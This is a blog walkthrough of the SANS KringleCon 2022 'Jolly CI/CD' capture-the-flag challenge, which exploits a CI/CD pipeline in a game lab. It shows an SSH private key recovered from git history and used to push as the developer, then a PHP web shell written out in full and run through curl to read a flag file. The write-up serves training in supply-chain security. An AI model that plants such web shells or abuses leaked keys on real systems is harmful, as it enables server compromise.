Elfen Ring - Jolly CI/CD Walkthrough

-

Jolly CI/CD

Difficulty Level 5/5

Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.

After completing Prison Escape Challenge, Upon further climbiung upstairs in the game, we talk to Rippin Proudfoot who asks us to solve an vulnerability in the CI/CD pipeline and we are being asked to exploit the vulnerability and get the ring back. Upon clicking the terminal we are presented with the following information in terminal. 


Based on the highlighted text seem like PHP is used and possibly a PHP code-based payload will give us a hand as we progress. And As per the screenshot have already begun enumeration on the like what are the privileges, filesystem & etc. 

After talking to Tinsel, we find the following, “With this project, once I push a commit, a GitLab runner will automatically deploy the changes to production.WHOOPS! I didn’t mean to commit that to http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git...Unfortunately, if attackers can get in that pipeline, they can make an awful mess of things!”

Second hint: The thing about Git is that every step of development is accessible – even steps you didn't mean to take! git log can show code skeletons.

So based on update from Tinsel, make sure we are able to ping the following server gitlab.flag.net.internal. once the ping is successful lets try and clone the repository for http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git, cd into the directory and run git log command which shows us the Whoops commit action (same word used by Tinsel)

>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

>> cd wordpress.flag.net.internal

>> git log


Next we deep dive on the specific commit message by using the below command

>> git show e19f653bde9ea3de6af21a587e41e7a909db1ca5



Based on the output we can see that the author knee-oh using address sprox@kringlecon.com has accidentally committed their SSH private key which has been captured in the commit log.

 

Now we can copy the SSH key, create a .ssh directory and paste the copied key. Limit the file permission on the key. Identify if SSH process is running and then add the key using ssh-add command.


Now will clone the repository using the added key and ssh method for cloning, so that we can get update rights to the repository with this newly grabbed identity


>> git clone sporx@kringlecon.com:gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git


Now navigate with “cd” command into the newly clone repo and lets see if we can add php webshell, but before that let edit the git config as per newly grabbed identity Knee-oh with the following commands


>> git config —-global user.email “sporx@kringlecon.com”

>> git config —-global user.name “knee-oh”

 

After which we add out webshell into a php file in the repository and perform git commit with a commit message and git push to push the changes to the main repository


>> echo '<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>0' > hmmm.php

>> git commit

>> git push

 

Now we can query our php webshell, if the payload has been uploaded to repo. We can now run the follow commands towards hmmm.php by supplying commands to the cmd parameter


>> curl http://wordpress.flag.net.internal/shell.php?cmd=id

>> curl http://wordpress.flag.net.internal/shell.php?cmd=pwd

>> curl http://wordpress.flag.net.internal/shell.php?cmd=ls+/


In this output we can see flag.txt in the root directory, hopefully we can cat that.

>> curl http://wordpress.flag.net.internal/shell.php?cmd=cat+/flag.txt



Security recommendations


This is a good example of depicting a supply chain risk, where a 3rd party developer may accidentally commit their Private key on the repository, that also gets replicated over the production instance. Which in turn allows the attacker push payloads and webshells to production instance allowing for fill compromise of the server. DevSecOPs practice needs to be implemented that warns the developer of credential at the commit stages to avoid pushing into the repository.

 

Troubleshoots


The whole setup for JollyCI/CD take 3-5 minutes to boot up, so be patient especially until these 2 command are successful


>> ping gitlab.flag.net.internal

>> git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git


Elfen Ring full map




Elf Ring Unlocked !

Since all the challenges were Linux ELF related, guessing that’s why called ELFen Ring






Comments

Post a Comment

Popular posts from this blog

SANS Kringlecon 2022 Introduction

-
Image
What Challenges Should You Expect?   This year, the infamously precious 5 Golden Rings have been stolen, and Santa needs your help to recover them. Each ring represents a different quest to defeat cybersecurity obstacles to change the course of the future and defeat holiday treachery:   1. Tolkien Ring (Network Security) - Analyse a PCAP to identify malware, and then analyse logs and create IDS rules to detect such attacks. 2. Elfen Ring (SecDevOps and Supply Chain Attacks) – Identify malicious packages and then attack CI/CD processes to escape a container. 3. Web Ring (Web Application Vulnerabilities and Exploitation) - Identify XML External Entity (XXE) attack and leverage such vulnerabilities to gain access. 4. Cloud Ring (Cloud Security) - Analyse cloud configurations via the command line, identifying possible vulnerabilities and information leakage. 5. Burning Ring of Fire (Cryptocurrency, NFT, and Smart Contract Attacks) - Acquire and spend cryptocurrency, then analyse a
Read more

Tolkien Ring - Wireshark Practice walkthrough

-
Image
By now we should be ready to start out first challenge as part of the Tolkien Ring, which is in relation to Wireshark Difficulty Rating: 1/5 Hints Just have to follow thorough the questions asked in terminal, by analysing the suspicious.pcap file in Wireshark   Solutions 1. What kinds of objects can be exported in the pcap file ?  HTTP Open up suspicious.pcap file in Wireshark, using the export objects option available in Wireshark. Now we can export different types of objects depending on what’s been captured in this pcap. When you choose to export HTTP objects you get to see 3 files, while the export options will be empty.   2. Name of the biggest file you can export ?  app.php (808kB) Within Wireshark in the object export tab for HTTP, you get to see 3 files, among which the biggest file by size 808kb is app.php     3. Packet number where app.php starts ?   687 In the object export tab within Wireshark, first column indicated the starting packet number of the conversation for tha
Read more

Elfen Ring - Prison Escape Walkthrough

-
Image
Prison Escape Challenge Difficulty 3/5 Clone a code repository. Get hints for this challenge from Bow Ninecandle in the Elfen Ring. After completing the Clone with a difference challenge , Getting back on the boat and progressing further through the game, we meet Tinsel Upatree with a terminal named “Prison Escape”, once we click on the terminal we are presented with the following screen that details the challenge and Based on the question, we need to find a hex string that contains the flag that needs to be submitted Seems like we need to find a way to privilege escalate or escape from the limited sandbox to be able to complete the challenge. given we can get linpeas transferred to this system, we will have to manually perform initial enumeration. Based on the above screenshot, Seems like some sort of docker container and now ill have to narrow down the enumeration to docker container escape .  Using the following docker container escape reference cheatsheet, while attempting enumerat
Read more